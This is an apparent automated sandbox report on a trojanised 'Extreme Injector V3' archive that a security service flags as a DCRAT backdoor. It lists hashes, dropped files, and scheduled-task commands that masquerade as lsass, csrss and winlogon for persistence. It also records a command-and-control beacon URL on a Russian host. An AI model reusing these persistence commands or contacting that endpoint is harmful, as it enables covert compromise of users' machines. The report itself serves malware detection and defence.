| File name: | Extreme Injector V3 (1).rar |
| Full analysis: | https://app.any.run/tasks/6706faee-d26c-4a24-9281-ec65605d077b |
| Verdict: | Malicious activity |
| Threats: | A backdoor is a type of cybersecurity threat that allows attackers to secretly compromise a system and conduct malicious activities, such as stealing data and modifying files. Backdoors can be difficult to detect, as they often use legitimate system applications to evade defense mechanisms. Threat actors often utilize special malware, such as PlugX, to establish backdoors on target devices. |
| Analysis date: | January 03, 2024, 18:38:50 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-rar |
| File info: | RAR archive data, v5 |
| MD5: | 13D7AD8E46DAA94F672431BD98DF1F61 |
| SHA1: | 3E6001D16B7670F39D6F09F429947EB289BD8FC5 |
| SHA256: | 8560B827D1A58DCC81C2D94DCE540443D3720C73AD7F3B854593E0CE837C83E7 |
| SSDEEP: | 98304:DGT24G+mz3CPnb4JpT7c7EcdLWf1Plob5KI/gjb9VSb654xAyuvAUpBOdgpmgAKu:S9L/ |
| .rar | | | RAR compressed archive (v5.0) (61.5) |
|---|---|---|
| .rar | | | RAR compressed archive (gen) (38.4) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 116 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Extreme Injector V3 (1).rar" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | |||||||||||
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.91.0 Modules
| |||||||||||||||
| 148 | schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\lsass.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 324 | "C:\Users\admin\AppData\Local\Temp\Rar$EXb116.13481\Extreme Injector V3.exe" | C:\Users\admin\AppData\Local\Temp\Rar$EXb116.13481\Extreme Injector V3.exe | — | WinRAR.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 376 | schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\MSOCache\All Users\lsass.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 552 | schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Users\Public\Libraries\lsass.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 908 | schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\PortCombrowserIntocrt\csrss.exe'" /rl HIGHEST /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 948 | "C:\MSOCache\All Users\{90140000-006E-0411-0000-0000000FF1CE}-C\1041\dllhost.exe" | C:\MSOCache\All Users\{90140000-006E-0411-0000-0000000FF1CE}-C\1041\dllhost.exe | FonthostDhcp.exe | ||||||||||||
User: admin Integrity Level: HIGH Exit code: 0 Version: 5.15.2.0 Modules
| |||||||||||||||
| 980 | schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Program Files\DVD Maker\Shared\winlogon.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 996 | schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\lsass.exe'" /f | C:\Windows\System32\schtasks.exe | — | WmiPrvSE.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1040 | C:\Windows\system32\cmd.exe /c ""C:\PortCombrowserIntocrt\9ooFS78ALNPOm.bat" " | C:\Windows\System32\cmd.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\virtio_ivshmem_master_build.zip | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (116) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2344 | FonthostDhcp.exe | C:\MSOCache\All Users\lsass.exe | executable | |
MD5:863DEF7359A0AD592392F1677C4995AD | SHA256:A7626C22E3C97CC9FC3E2E5B999F0796C53008B91F6F46EBB16E659764FC3BAA | |||
| 324 | Extreme Injector V3.exe | C:\PortCombrowserIntocrt\FonthostDhcp.exe | executable | |
MD5:863DEF7359A0AD592392F1677C4995AD | SHA256:A7626C22E3C97CC9FC3E2E5B999F0796C53008B91F6F46EBB16E659764FC3BAA | |||
| 324 | Extreme Injector V3.exe | C:\PortCombrowserIntocrt\file.vbs | text | |
MD5:677CC4360477C72CB0CE00406A949C61 | SHA256:F1CCCB5AE4AA51D293BD3C7D2A1A04CB7847D22C5DB8E05AC64E9A6D7455AA0B | |||
| 2344 | FonthostDhcp.exe | C:\MSOCache\All Users\{90140000-0016-0410-0000-0000000FF1CE}-C\6ccacd8608530f | text | |
MD5:EB0D3B2E3E5DC60AF6797DBB852E98B2 | SHA256:94ED4F4571DB154B5C139610F0FF637F7BC0C293DE8F225FFCAD9671D7AE6C48 | |||
| 2344 | FonthostDhcp.exe | C:\Program Files\DVD Maker\Shared\winlogon.exe | executable | |
MD5:863DEF7359A0AD592392F1677C4995AD | SHA256:A7626C22E3C97CC9FC3E2E5B999F0796C53008B91F6F46EBB16E659764FC3BAA | |||
| 2344 | FonthostDhcp.exe | C:\Users\Public\Libraries\lsass.exe | executable | |
MD5:863DEF7359A0AD592392F1677C4995AD | SHA256:A7626C22E3C97CC9FC3E2E5B999F0796C53008B91F6F46EBB16E659764FC3BAA | |||
| 2344 | FonthostDhcp.exe | C:\MSOCache\All Users\{90140000-0016-0410-0000-0000000FF1CE}-C\Idle.exe | executable | |
MD5:863DEF7359A0AD592392F1677C4995AD | SHA256:A7626C22E3C97CC9FC3E2E5B999F0796C53008B91F6F46EBB16E659764FC3BAA | |||
| 2344 | FonthostDhcp.exe | C:\Users\Public\Libraries\6203df4a6bafc7 | text | |
MD5:E8B27818C3C972C2FD104D85008FB2E4 | SHA256:6473AAF37FD32EF4BBAD5A6CE6AE36B92D565AE386044747D01D0D4D39C2CDA9 | |||
| 324 | Extreme Injector V3.exe | C:\PortCombrowserIntocrt\9ooFS78ALNPOm.bat | text | |
MD5:F190F7F19BB37D9FD4F72586514CCEB1 | SHA256:D3AE983A4BDE4226B109EED16A55AC4E123D422EC17C2B9F23B773A5D431DB39 | |||
| 2344 | FonthostDhcp.exe | C:\MSOCache\All Users\{90140000-006E-0411-0000-0000000FF1CE}-C\1041\5940a34987c991 | text | |
MD5:4289CB78A6DEB3FDBD1C85B85A31D6A2 | SHA256:41A609293E1BA1A0C16DA6253E6D7F6FB1D00CE6AA1F867BC8B7B0D0E00A595E | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | — | 141.8.192.103:80 | http://a0900442.xsph.ru/L1nc0In.php?qoBdyXSURxompSYN9b6Z77LyLHN=Xe&Hhhw2=ykdxOcDFrBmjCtqOK3tcNRqKR6x&d910117de1a31e3e3912b057c0b12822=bea1bc314bb95217d6e743e5ee7ae803&c0abd845fefa6cccd022caa19260d7d8=QMlJTZ2cTMiBjNxUTNwMmY2MTNyIGN2QDZ0U2YwYGN4IWZlFGNkFjY&qoBdyXSURxompSYN9b6Z77LyLHN=Xe&Hhhw2=ykdxOcDFrBmjCtqOK3tcNRqKR6x | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
948 | dllhost.exe | 172.67.34.170:443 | pastebin.com | CLOUDFLARENET | US | unknown |
948 | dllhost.exe | 141.8.192.103:80 | a0900442.xsph.ru | Sprinthost.ru LLC | RU | unknown |
Domain | IP | Reputation |
|---|---|---|
pastebin.com |
| shared |
a0900442.xsph.ru |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
1080 | svchost.exe | Misc activity | ET INFO Observed DNS Query to xsph .ru Domain |
1080 | svchost.exe | Misc activity | ET INFO Observed DNS Query to xsph .ru Domain |
948 | dllhost.exe | A Network Trojan was detected | ET MALWARE DCRAT Activity (GET) |